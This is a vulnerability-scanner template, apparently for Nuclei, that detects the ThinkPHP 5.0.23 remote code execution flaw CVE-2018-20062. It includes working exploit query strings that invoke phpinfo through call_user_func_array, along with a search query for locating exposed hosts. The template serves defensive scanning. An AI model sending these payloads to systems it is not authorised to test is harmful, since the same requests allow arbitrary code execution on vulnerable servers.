An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\think\Request/input&filter=phpinfo&data=1 query string.
PoC代码[已公开]
id: CVE-2018-20062
info:
name: ThinkPHP 5.0.23 - Remote Code Execution
author: dr_set
severity: critical
description: |
An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows remote attackers to execute arbitrary PHP code via crafted use of the filter parameter, as demonstrated by the s=index/\think\Request/input&filter=phpinfo&data=1 query string.
reference:
- https://github.com/yilin1203/CVE-2018-20062/blob/main/CVE-2018-20062.py
- https://github.com/yilin1203/CVE-2018-20062
- https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-20062
epss-score: 0.94307
epss-percentile: 0.99938
cpe: cpe:2.3:a:5none:nonecms:1.3.0:*:*:*:*:*:*:*
metadata:
vendor: 5none
product: nonecms
fofa-query: app="ThinkPHP"
verified: true
max-request: 1
tags: cve,cve2018,kev,thinkphp,rce,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
- "ThinkPHP"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100cf819bfcc6e173ebbdb7117e49b520f260251c5dd8a1b83a3c716be234e2c035022100f84e68afbd4fbd04aa1a3b5a8e3f4f82a902e7e721e7b67247d4a56c5fc9e892:922c64590222798bb761d5b6d8e72950